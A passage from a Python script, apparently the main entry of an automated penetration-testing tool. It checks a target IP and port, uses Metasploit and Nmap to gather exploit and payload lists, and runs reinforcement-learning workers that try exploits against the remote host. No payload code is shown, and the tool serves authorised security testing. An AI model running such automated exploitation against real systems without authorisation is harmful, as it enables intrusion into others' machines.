    if port is None:
        return False

    # isdecimal() rather than isdigit(): isdigit() also accepts characters
    # such as superscript digits, which int() rejects with ValueError.
    if not port.isdecimal() or not 1 <= int(port) <= 65535:
        print('[*] Invalid port number: {0}'.format(port))
        return False

    if port not in com_port_list:
        print('[*] Not open port number: {0}'.format(port))
        return False

    # The original compared type(service) with the string 'int', which can
    # never be equal; isinstance() makes the integer check effective.
    if service is None or isinstance(service, int):
        print('[*] Invalid service name: {0}'.format(str(service)))
        return False

    return True


# Common list of all threads.
# Module-level defaults; the __main__ block below replaces them with real values.
com_port_list = []  # Port numbers; read by check_port_value(), set from env.get_port_list().
com_exploit_list = []  # Set from env.get_exploit_list().
com_payload_list = []  # Set from env.get_payload_list(), then 'no payload' is appended.
com_indicate_flag = False  # Set to the result of check_port_value(port, service).

if __name__ == '__main__':
    # Script entry point: parse arguments, gather target information through
    # Metasploit, then run the learning or testing workers on threads.
    # The names assigned here are module-level globals.

    # Get command arguments.
    rhost, mode, port, service = command_parse()
    if is_valid_ip(rhost) is False:
        print('[*] Invalid IP address: {0}'.format(rhost))
        exit(1)
    if mode not in ['train', 'test']:
        print('[*] Invalid mode: {0}'.format(mode))
        exit(1)

    # Show initial banner.
    show_banner(0.1)

    # Initialization of Metasploit.
    env = Metasploit(rhost)
    NUM_STATES = len(env.state)  # State (s) of Deep Exploit.
    env.execute_nmap()  # Execute Nmap.
    com_port_list, proto_list, info_list = env.get_port_list()  # Get port list.
    com_exploit_list = env.get_exploit_list()  # Get exploit list.
    com_payload_list = env.get_payload_list()  # Get payload list.
    com_payload_list.append('no payload')  # Add 'no payload' to payload list.

    # Create exploit tree.
    exploit_tree = get_exploit_tree(env)

    # Create target host information.
    # When a valid port/service pair was indicated, com_port_list is replaced
    # by the virtual ports generated for the indicated products.
    com_indicate_flag = check_port_value(port, service)
    if com_indicate_flag:
        target_tree, com_port_list = get_target_info_indicate(env, rhost, proto_list, info_list, port, service)
    else:
        target_tree = get_target_info(env, rhost, proto_list, info_list)

    # Initialization of global option.
    TRAIN_WORKERS = env.train_worker_num
    TEST_WORKER = env.test_worker_num
    MAX_STEPS = env.train_max_steps
    MAX_TRAIN_NUM = env.train_max_num
    Tmax = env.train_tmax

    env.client.termination(env.console_id)  # Disconnect common MSFconsole.
    NUM_ACTIONS = len(com_payload_list)  # Set action number.
    NONE_STATE = np.zeros(NUM_STATES)  # Initialize state (s).

    # Define global variable, start TensorFlow session.
    frames = 0  # All trial number of all threads.
    isFinish = False  # Finishing learning/testing flag.
    SESS = tf.Session()  # Start TensorFlow session.

    with tf.device("/cpu:0"):
        parameter_server = ParameterServer()
        threads = []

        if mode == 'train':
            # Create learning thread.
            for idx in range(TRAIN_WORKERS):
                thread_name = 'local_thread' + str(idx + 1)
                threads.append(Worker_thread(thread_name=thread_name,
                                             thread_type="learning",
                                             parameter_server=parameter_server,
                                             rhost=rhost))
        else:
            # Create testing thread.
            for idx in range(TEST_WORKER):
                thread_name = 'local_thread1'
                threads.append(Worker_thread(thread_name=thread_name,
                                             thread_type="test",
                                             parameter_server=parameter_server,
                                             rhost=rhost))

    # Define saver.
    saver = tf.train.Saver()

    # Execute TensorFlow with multi-thread.
    COORD = tf.train.Coordinator()  # Prepare of TensorFlow with multi-thread.
    SESS.run(tf.global_variables_initializer())  # Initialize variable.

    running_threads = []  # NOTE(review): never populated in this block.
    if mode == 'train':
        # Load past learned data.
        if os.path.exists(env.save_file) is True:
            # Restore learned model from local file.
            print('[*] Restore learned data.')
            saver.restore(SESS, env.save_file)

        # Execute learning.
        run_args = (exploit_tree, target_tree, saver, env.save_file)
    else:
        # Execute testing.
        # Restore learned model from local file.
        print('[*] Restore learned data.')
        saver.restore(SESS, env.save_file)
        run_args = (exploit_tree, target_tree)

    # Give every thread its own worker's bound method. A
    # `lambda: worker.run(...)` would look up `worker` only when the thread
    # actually runs, by which time the loop may have rebound it to the next
    # worker, so several threads could end up running the same worker.
    for worker in threads:
        t = threading.Thread(target=worker.run, args=run_args)
        t.start()
